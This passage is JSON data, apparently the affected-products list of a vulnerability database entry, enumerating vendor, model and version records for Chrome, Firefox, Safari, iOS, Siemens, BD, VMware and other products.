"vendor": "google", "version": "6.0.433.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.117" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.201" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.94" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "38.0.2125.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.153" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.201" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1687.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.22" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.903.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.733.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.749.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.113" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.762.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.719.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.12" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.271.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.813.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.7" }, { "model": "assurity linc", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.237" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.53" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.77" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.211" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.622.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.673.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.1" }, { "model": "accuri c6 plus", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "simatic ipc477c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1063.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.187" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.383.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.790.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.465.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.319" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.33" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.658.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "48.0.2564.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "51.0.2704.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.932.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.13" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "29.0.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.34" }, { "model": "pyxis infant care verification", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.41" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "49.0.2623.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1064.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.23" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.0" }, { "model": "pyxis supplystation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1651.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1003.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.95" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.391.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.6" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1664.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.18" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.89" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "64.0.3282.167" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.2" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.81" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1031" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "58.0.3029.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1007.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.40" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.326.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1680.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.39" }, { "model": "sinema remote connect", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.213" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.23" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "36.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.32" }, { "model": "simatic field pg m5", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "22.1.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1010" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.337" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.51" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.4" }, { "model": "pyxis medstation console", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "40000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.15" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.27" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.170" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.33" }, { "model": "simatic hmi comfort panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1051" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.98" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.112" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.87" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "22.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.45" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.896.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.417.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.218" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.334" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.657.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "37.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "52.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1049" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.331" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1057" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1673.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.689.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.39" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "43.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.55" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1288.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "40" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.390.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1655.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.707.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.38" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1081.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.50" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1011.1" }, { "model": "fusion", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "8.5.9" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "47" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1067.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.44" }, { "model": "communications lsms", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1664.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.801.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.1" }, { "model": "rowa smart", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1048.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.807.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.865.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.86" }, { "model": "workstation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "12.5.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1296.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.481.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.489.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.55" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "51.0.2704.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.97" }, { "model": "pixel xl", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.10.1" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.47" }, { "model": "windows server", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.50" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "45.0.2454.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "60.0.3080.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "59.0.3071.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.96" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.572.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.29" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.93" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "18.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.786.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "36.0.1985.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": 